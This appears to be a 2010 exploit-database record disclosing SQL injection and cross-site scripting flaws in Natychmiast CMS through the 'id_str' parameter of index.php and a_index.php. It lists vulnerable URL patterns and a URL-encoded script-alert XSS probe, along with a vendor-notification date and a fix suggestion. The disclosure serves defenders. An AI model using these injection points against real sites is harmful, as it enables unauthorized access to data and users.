Natychmiast CMS Cross Site Scripting / SQL Injection Vulnerability

2010-03-05T00:00:00

Description

Exploit for unknown platform in category web applications

{"id": "1337DAY-ID-11182", "type": "zdt", "bulletinFamily": "exploit", "title": "Natychmiast CMS Cross Site Scripting / SQL Injection Vulnerability", "description": "Exploit for unknown platform in category web applications", "published": "2010-03-05T00:00:00", "modified": "2010-03-05T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/11182", "reporter": "Ariko-Security", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-03-12T17:08:22", "viewCount": 3, "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "sourceHref": "https://0day.today/exploit/11182", "sourceData": "==================================================================\r\nNatychmiast CMS Cross Site Scripting / SQL Injection Vulnerability\r\n==================================================================\r\n\r\n SQL injection and XSS vulnerability in NATYCHMIAST CMS \r\n\r\n\r\n\r\nVendor's Description of Software:\r\n# http://www.natychmiast-cms.pl/Natychmiast+CMS.html [Polish]\r\n\r\nDork:\r\n# N/A\r\n\r\nApplication Info:\r\n# Name: NATYCHMIAST CMS\r\nVulnerability Info:\r\n# Type: SQL injection and XSS Vulnerability\r\n# Risk: medium\r\n\r\nFix: \r\n# N/A\r\n\r\nTime Table:\r\n# 03/03/2010 - Vendor notified.\r\n\r\nInput passed via the \"id_str\" parameter to index.php and a_index.php is not properly sanitised before being used in a SQL query.\r\n\r\nSolution:\r\n# Input validation of \"id_str\" parameter should be corrected.\r\n\r\n\r\nVulnerabilities:\r\n# http://[site]/index.php?id_str=[SQLi] \r\n# http://[site]/a_index.php?id_str=[SQLi]\r\n# XSS index.php?id_str='%22%3E%3Cscript%3Ealert(0x000024)%3C/script%3E\r\n# XSS a_index.php?id_str='%22%3E%3Cscript%3Ealert(0x000024)%3C/script%3E\r\n\r\n\r\n\r\n\n# 0day.today [2018-03-12] #", "_state": {"dependencies": 1647118359}}